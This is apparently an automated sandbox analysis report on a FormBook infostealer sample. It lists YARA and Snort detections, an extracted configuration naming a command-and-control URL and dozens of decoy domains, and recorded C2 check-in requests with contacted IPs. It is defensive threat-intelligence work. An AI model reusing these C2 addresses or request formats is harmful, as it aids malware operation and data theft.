2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xfeb59:$sqlite3step: 68 34 1C 7B E1 0xfec6c:$sqlite3step: 68 34 1C 7B E1 0x126979:$sqlite3step: 68 34 1C 7B E1 0x126a8c:$sqlite3step: 68 34 1C 7B E1 0xfeb88:$sqlite3text: 68 38 2A 90 C5 0xfecad:$sqlite3text: 68 38 2A 90 C5 0x1269a8:$sqlite3text: 68 38 2A 90 C5 0x126acd:$sqlite3text: 68 38 2A 90 C5 0xfeb9b:$sqlite3blob: 68 53 D8 7F 8C 0xfecc3:$sqlite3blob: 68 53 D8 7F 8C 0x1269bb:$sqlite3blob: 68 53 D8 7F 8C 0x126ae3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.anamentor.com/shjn/"], "decoy": ["trendlito.com", "myspoiledbytchcreations.com", "skinsotight.com", "merakii.art", "sakina.digital", "qumpan.com", "juxing666.com", "andrewolivercounselling.com", "blastaerobics.com", "linevshaper.store", "legendvacationrentals.com", "adna17.com", "ingodwetrustdaycare.com", "j98066.com", "noordinarybusiness.com", "pacelicensedelectrician.com", "istanbulmadencilik.com", "roboscop.com", "njhude.com", "eaglelures.com", "asmrfans.com", "wwv-kraken-apps.com", "agora.markets", "factechcolombia.com", "cadillacjacksbargrill.com", "lakearrowheadescape.com", "privatelymeeting.com", "purelol.com", "bailey-holzwerk.com", "lawsorlando.com", "zoonseo.com", "petscomfortgrooming.com", "blogreen.xyz", "modernmpm.com", "axe8.club", "majesticgolftours.com", "happyj.biz", "2ed58fwec.xyz", "moms4real.com", "craftsbylarissa.com", "ninetofivetheses.com", "giftsetswithlove.com", "artistryinahome.com", "bestofdubrovnik.info", "mediakal-sa.net", "9158cs.xyz", "sakuratyu.com", "christasconezntreats.com", "flex-aportelabels.com", "douyinliu.com", "meet-bait.com", "sumikkoremon.com", "jjscryptosignals.com", "repsychel.com", "hartfulcleaning.com", "buylandintexas.net", "xn--blogins-w1b.com", "aksene.com", "californialandscapeimages.com", "watchyellow.space", "altcultpromotions.com", "fusiongroupgames.net", "panchmitramultitrade.com", "theledgrowbook.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 9LjOeq9jnl.exe

ReversingLabs: Detection: 32%

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: www.anamentor.com/shjn/

Avira URL Cloud: Label: malware

Source: 7.2.9LjOeq9jnl.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: 9LjOeq9jnl.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 9LjOeq9jnl.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: 9LjOeq9jnl.exe, 00000007.00000002.439553188.00000000033C0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 9LjOeq9jnl.exe, 00000007.00000002.437631998.00000000014CF000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 9LjOeq9jnl.exe, 00000007.00000002.437631998.00000000014CF000.00000040.00000001.sdmp, wscript.exe
Source:	Binary string: wscript.pdb source: 9LjOeq9jnl.exe, 00000007.00000002.439553188.00000000033C0000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 4x nop then jmp 070C1ABBh	2_2_070C1A02
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 4x nop then jmp 070C1ABBh	2_2_070C1860
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 4x nop then pop esi	7_2_00415845
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 4x nop then pop ebx	7_2_00406AB4
Source: C:\Users\user\Desktop\9LjOeq9jnl.exe	Code function: 4x nop then pop esi	7_2_00415760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi	17_2_009A5845
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop ebx	17_2_00996AB5
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi	17_2_009A5760

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49838 -> 142.111.24.2:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49838 -> 142.111.24.2:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49838 -> 142.111.24.2:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 142.111.24.2 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.repsychel.com
Source: C:\Windows\explorer.exe	Domain query: www.flex-aportelabels.com
Source: C:\Windows\explorer.exe	Network Connect: 46.38.243.234 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.233.121.61 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.christasconezntreats.com
Source: C:\Windows\explorer.exe	Domain query: www.qumpan.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.anamentor.com/shjn/

Source: Joe Sandbox View

ASN Name: IOMART-ASGB IOMART-ASGB

Source: global traffic	HTTP traffic detected: GET /shjn/?UTqtRv=M2Xo1sk/PcdvYlySg++E/1rcNB0ZJYFL6a/vKXHyKrNsPeuk4b/zAJjzao2c5vk7I5lO&Whc=0DHdArEp5hQd HTTP/1.1Host: www.flex-aportelabels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shjn/?UTqtRv=Bck6v8Q7O88rutfkCywFCzEhcupnZwvilAlKH6TNYdqDwzSjrXWf51hg8vLZW/hTgHNK&Whc=0DHdArEp5hQd HTTP/1.1Host: www.repsychel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shjn/?UTqtRv=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABbTrmmBq9f&Whc=0DHdArEp5hQd HTTP/1.1Host: www.qumpan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 62.233.121.61 62.233.121.61

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Oct 2021 10:48:48 GMTServer: ApacheLast-Modified: Thu, 29 Oct 2020 17:44:48 GMTETag: "82a1a-f65-5b2d2d61e36a7"Accept-Ranges: bytesContent-Length: 3941X-Frame-Options: DENYConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 36 39 32 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 53 61 6e 73 20 55 6e 69 63 6f 64 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 47 61 72 75 64 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 09 09 61 20 7b 0d 0a 09 09 09 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 09 09 09 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 72 61 70 70 65 72 20 7b 0d 0a 09 09 09 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 30 30 70 78 3b 0d 0a 09 09 09 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 65 6d 3b 0d 0a 09
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Oct 2021 10:47:53 GMTServer: Apache/2.4.10 (Debian)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 71 75 6d 70 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.qumpan.com Port 80</address></body></html>

Source: 9LjOeq9jnl.exe, 00000002.00000003.308033060.00000000058A3000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 9LjOeq9jnl.exe, 00000002.00000003.308033060.00000000058A3000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.comur=u
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com-c
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com0
Source: 9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comK
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comi
Source: 9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comko
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como._
Source: 9LjOeq9jnl.exe, 00000000.00000002.312983865.0000000005340000.00000004.00020000.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.341688942.0000000002A51000.00000004.00000001.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: 9LjOeq9jnl.exe	String found in binary or memory: http://www.evolvinguniverse.net/portal/index.php?format=feed&type=rss
Source: 9LjOeq9jnl.exe, 00000002.00000002.347165395.00000000058A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 9LjOeq9jnl.exe, 00000002.00000003.311569574.00000000058A5000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp//nl
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/C
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: 9LjOeq9jnl.exe, 00000002.00000003.315160089.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/S
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0rs
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/http
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/S
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Z
Source: 9LjOeq9jnl.exe, 00000002.00000003.313565748.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/k.S
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/l
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/w
Source: 9LjOeq9jnl.exe, 00000002.00000003.315160089.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ww.ml
Source: 9LjOeq9jnl.exe, 00000002.00000003.315303139.00000000058AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: 9LjOeq9jnl.exe, 00000002.00000003.306882909.00000000058BB000.00000004.00000001.sdmp, 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 9LjOeq9jnl.exe, 00000002.00000003.306882909.00000000058BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comeg
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 9LjOeq9jnl.exe, 00000002.00000003.311765475.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.&
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 9LjOeq9jnl.exe, 00000002.00000003.311666116.00000000058A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com)
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 9LjOeq9jnl.exe, 00000002.00000003.308374807.00000000058A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.neta
Source: 9LjOeq9jnl.exe, 00000002.00000003.308374807.00000000058A4000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netana
Source: 9LjOeq9jnl.exe, 00000002.00000002.347319454.0000000006AB2000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 9LjOeq9jnl.exe, 00000002.00000003.312428780.00000000058A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.
Source: 9LjOeq9jnl.exe, 00000002.00000003.312747818.00000000058AF000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cntaN
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: https://controlpanel.easyspace.com/
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: https://supportservices.easyspace.com/
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: https://www.easyspace.com/
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: https://www.easyspace.com/assets/images/structure/easyspace-logo-main.svg
Source: wscript.exe, 00000011.00000002.565026297.00000000051F2000.00000004.00020000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: unknown

DNS traffic detected: queries for: www.flex-aportelabels.com

Source: global traffic	HTTP traffic detected: GET /shjn/?UTqtRv=M2Xo1sk/PcdvYlySg++E/1rcNB0ZJYFL6a/vKXHyKrNsPeuk4b/zAJjzao2c5vk7I5lO&Whc=0DHdArEp5hQd HTTP/1.1Host: www.flex-aportelabels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shjn/?UTqtRv=Bck6v8Q7O88rutfkCywFCzEhcupnZwvilAlKH6TNYdqDwzSjrXWf51hg8vLZW/hTgHNK&Whc=0DHdArEp5hQd HTTP/1.1Host: www.repsychel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /shjn/?UTqtRv=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABbTrmmBq9f&Whc=0DHdArEp5hQd HTTP/1.1Host: www.qumpan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: 9LjOeq9jnl.exe, 00000000.00000002.304072642.00000000010DA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.378629628.0000000007957000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.343140057.0000000003A59000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436667647.0000000000E90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562536876.0000000001350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.562301653.0000000001010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.436706282.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.9LjOeq9jnl.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.9LjOeq9jnl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.9LjOeq9jnl.exe.3b9bf30.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.9LjOeq9jnl.exe.3b50d10.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.561977714.0000000000990000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.396784808.0000000007957000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
